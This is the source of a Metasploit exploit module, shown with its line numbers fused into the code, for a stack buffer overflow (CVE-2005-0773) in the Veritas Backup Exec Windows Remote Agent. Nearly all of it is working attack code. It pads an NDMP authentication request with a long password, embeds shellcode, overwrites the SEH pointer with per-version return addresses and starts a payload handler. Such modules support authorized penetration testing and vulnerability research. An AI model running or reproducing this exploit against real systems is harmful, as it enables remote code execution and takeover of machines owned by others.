Path: blob/master/modules/exploits/windows/backupexec/remote_agent.rb
19591 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = GreatRanking78include Msf::Exploit::Remote::NDMP910def initialize(info = {})11super(12update_info(13info,14'Name' => 'Veritas Backup Exec Windows Remote Agent Overflow',15'Description' => %q{16This module exploits a stack buffer overflow in the Veritas17BackupExec Windows Agent software. This vulnerability occurs18when a client authentication request is received with type19'3' and a long password argument. Reliable execution is20obtained by abusing the stack buffer overflow to smash a SEH21pointer.22},23'Author' => [ 'hdm' ],24'License' => MSF_LICENSE,25'References' => [26[ 'CVE', '2005-0773'],27[ 'OSVDB', '17624'],28[ 'BID', '14022'],29[ 'URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities']30],31'Privileged' => true,32'DefaultOptions' => {33'EXITFUNC' => 'process',34},35'Payload' => {36'Space' => 1024,37'BadChars' => "\x00",38'StackAdjustment' => -3500,39},40'Platform' => %w{win},41'Targets' => [42[43'Veritas BE 9.0/9.1/10.0 (All Windows)',44{45'Platform' => 'win',46'Rets' => [ 0x0140f8d5, 0x014261b0 ],47},48],49[50'Veritas BE 9.0/9.1/10.0 (Windows 2000)',51{52'Platform' => 'win',53'Rets' => [ 0x75022ac4, 0x75022ac4 ],54},55],56],57'DefaultTarget' => 0,58'DisclosureDate' => '2005-06-22',59'Notes' => {60'Reliability' => UNKNOWN_RELIABILITY,61'Stability' => UNKNOWN_STABILITY,62'SideEffects' => UNKNOWN_SIDE_EFFECTS63}64)65)6667register_options(68[69Opt::RPORT(10000)70]71)72end7374def check75info = ndmp_info()76if (info and info['Version'])77vprint_status(" Vendor: #{info['Vendor']}")78vprint_status("Product: #{info['Product']}")79vprint_status("Version: #{info['Version']}")8081if (info['Vendor'] =~ /VERITAS/i and info['Version'] =~ /^(4\.2|5\.1)$/)82return Exploit::CheckCode::Appears83end84end85return Exploit::CheckCode::Safe86end8788def exploit89connect9091print_status("Trying target #{target.name}...")9293resp = ndmp_recv()9495username = 'X' * 51296password = rand_text_alphanumeric(8192)9798# Place our payload early in the request and jump backwards into it99password[3536 - payload.encoded.length, payload.encoded.length] = payload.encoded100101# This offset is required for version 10.0102password[3536, 2] = "\xeb\x06"103password[3540, 4] = [ target['Rets'][1] ].pack('V')104password[3544, 5] = "\xe9" + [-1037].pack('V')105106# This offset is required for version 9.0/9.1107password[4524, 2] = "\xeb\x06"108password[4528, 4] = [ target['Rets'][0] ].pack('V')109password[4532, 5] = "\xe9" + [-2025].pack('V')110111# Create the authentication request112auth = [1131, # Sequence number114Time.now.to_i, # Current time1150, # Message type (request)1160x901, # Message name (connect_client_auth)1170, # Reply sequence number1180, # Error status1193 # Authentication type120].pack('NNNNNNN') +121[ username.length ].pack('N') + username +122[ password.length ].pack('N') + password +123[ 4 ].pack('N')124125print_status("Sending authentication request...")126ndmp_send(auth)127128# Attempt to read a reply (this should fail)129ndmp_recv()130131handler132disconnect133end134end135136137